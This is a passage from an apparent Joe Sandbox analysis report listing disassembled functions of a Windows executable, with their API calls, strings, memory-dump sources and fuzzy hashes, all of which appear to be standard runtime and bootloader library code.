                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                        • Opcode ID: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                                                                                                                                                                        • Instruction ID: cecd490d1094c8663a3dbd97117186f6eadc027e4e540ea95cab4118f9284f1a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5041A266A196C241EA30AF11AC802AAB3B4FF45B84F8A103DDF5C57786DE3CD401DF10
                                                                                                                                                                                                                        Function 00007FF72935A5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7293543FD,?,?,?,?,00007FF72935979A,?,?,?,?,00007FF72935649F), ref: 00007FF72935A5E7
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7293543FD,?,?,?,?,00007FF72935979A,?,?,?,?,00007FF72935649F), ref: 00007FF72935A61D
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7293543FD,?,?,?,?,00007FF72935979A,?,?,?,?,00007FF72935649F), ref: 00007FF72935A64A
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7293543FD,?,?,?,?,00007FF72935979A,?,?,?,?,00007FF72935649F), ref: 00007FF72935A65B
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7293543FD,?,?,?,?,00007FF72935979A,?,?,?,?,00007FF72935649F), ref: 00007FF72935A66C
                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF7293543FD,?,?,?,?,00007FF72935979A,?,?,?,?,00007FF72935649F), ref: 00007FF72935A687
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                        • Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                                                                                                                                        • Instruction ID: 6352b2ea829ae48d0c27c1031a22b482c2ff147c02670f18702d36bd22cfcbd0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5112F20A0C24262FA64BB219ED5179A9B2DF4D7A0F8C473CD83E466E7DD2CA4057F21
                                                                                                                                                                                                                        Function 00007FF729342300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                        • Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                                                        • Instruction ID: 7fadac7e4ccb7d7f67808c45495a6cd317a9dda481b132408f440291a3ddadfb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27315E7660968289EB24AF61EC952E9A370FF89784F88013DEA4D47B5ADF3CD104DB14
                                                                                                                                                                                                                        Function 00007FF729342760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                        • API String ID: 1878133881-640379615
                                                                                                                                                                                                                        • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                        • Instruction ID: 523e09e90940651bed9953c6abe20bd23a795eff9ff163ea8d13f78fd4685fbe
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F21827261CA8591E620AF10FC917EAA374FB84784F84103EE68C1365ADF3CD645DF54
                                                                                                                                                                                                                        Function 00007FF729358DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                        • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                        • Instruction ID: ed873aa81b148e4ef004a5ce67370f44a17a69b0223fd45cfdf73fd4d048579a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58F04F21A1970292EA10AF24ACD83B99770EF497A1FDC063DC56D461E5DF2CD049EF24
                                                                                                                                                                                                                        Function 00007FF729368678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                        • Instruction ID: cbb69522fa3768b197acd20670a2bded78085c4d4f24af2c4a07172b90ae5cd0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA11BF32E1CA0301F6543928DCD53758560EF5C368F9F063CEAAE066D78E2CA840AD38
                                                                                                                                                                                                                        Function 00007FF72935A6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7293598B3,?,?,00000000,00007FF729359B4E,?,?,?,?,?,00007FF729359ADA), ref: 00007FF72935A6BF
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7293598B3,?,?,00000000,00007FF729359B4E,?,?,?,?,?,00007FF729359ADA), ref: 00007FF72935A6DE
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7293598B3,?,?,00000000,00007FF729359B4E,?,?,?,?,?,00007FF729359ADA), ref: 00007FF72935A706
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7293598B3,?,?,00000000,00007FF729359B4E,?,?,?,?,?,00007FF729359ADA), ref: 00007FF72935A717
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7293598B3,?,?,00000000,00007FF729359B4E,?,?,?,?,?,00007FF729359ADA), ref: 00007FF72935A728
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                        • Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                                                                                                                                        • Instruction ID: 0ffd9d0cee349a1e5e633977638be773a02233dd5fa1dbd29f646c4034fd62f2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C116020A0824221FA64BB659DC1179A5B1DF4D3A0ECC433CD83D566E7DE2CE505BF21
                                                                                                                                                                                                                        Function 00007FF72935A534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                        • Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                                                                                                                                        • Instruction ID: 41355cae33a22ab43d83183edb0db0ed9331c82addb20f162eaa4e1244fb5f0e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9110050A0820761FA68BB659CD157999A1CF4D360FCC4B3CD97E492D3DD2CB5057E31
                                                                                                                                                                                                                        Function 00007FF7293552B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                        • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                        • Instruction ID: 9787e08d81db68c2f6cc9533278dd51c24d6f50c84c1951a46c718452f2304cd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D891C163A0C64651E721AE25D89037EBAA1EB0CB54FCC4539DA4E463D6DF3CF845AB20
                                                                                                                                                                                                                        Function 00007FF72935EED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                        • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                        • Instruction ID: 35c6a2feece78881e52fadaf58ade43dcddc7cc876616d4f2b67328e868fbb47
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D81B472E08242A6F6647E25C9C0378AEB0EB1D744FDD803DCA49D7287DF2DE501BA21
                                                                                                                                                                                                                        Function 00007FF72934C968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                        • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                        • Instruction ID: a4acd2095b96996276c9b9423543652ff2a0db530d44ff847ceb6005e9e2977b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D551C631B196428ADB14EF15EC846B9B3B1FB44B88F9A9138DA4D43746DF7CE841DB20
                                                                                                                                                                                                                        Function 00007FF72934E1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                        • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                        • Instruction ID: 24d275e308bd4365eee3642977c12fc43bbd2ae2287990847ffea7f2fa33cec9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71618F32908B8585D771AF15E8803AAB7B0FB85784F495229EB9C03B96CF7CE190DF50
                                                                                                                                                                                                                        Function 00007FF72934E5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                        • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                        • Instruction ID: d06f192c71c3460b81ef4762b6728ab9e9836a38050a63257bc6efd2cd6ad0f0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 275194329082428AEB74AE119C8426ABAF0FB54B94F996139DA5C477D7CF3CE4609F11
                                                                                                                                                                                                                        Function 00007FF729347530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF72934324C,?,?,00007FF729343964), ref: 00007FF729347642
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                        • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                        • Instruction ID: 1007f83c3d65583dba153f283854ed4f17f7c9ee2011fcb123a3717dff3f813e
